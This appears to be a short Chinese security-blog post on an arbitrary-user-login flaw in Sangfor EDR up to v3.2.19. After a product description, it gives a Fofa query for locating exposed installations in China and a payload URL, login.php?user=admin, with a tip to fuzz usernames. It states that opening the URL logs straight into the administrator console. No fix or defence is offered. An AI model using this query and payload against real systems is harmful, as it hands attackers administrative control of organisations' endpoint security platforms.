002-深信服 EDR 任意用户登录

# 深信服 EDR 任意用户登录

漏洞名称: 某信服 EDR 任意用户登录漏洞
影响范围: EDR <= v3.2.19 漏洞描述: 终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 Fofa: ``` title="终端检测响应平台" && country="CN" ``` ``` payload: https://127.0.0.1:443/ui/login.php?user=username //username可以去fuzz一波 ``` ``` https://XX.XX.XX.XX:443/ui/login.php?user=admin ``` 直接访问可成功登录管理界面: ![](media/202008/15979368153405.jpg)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容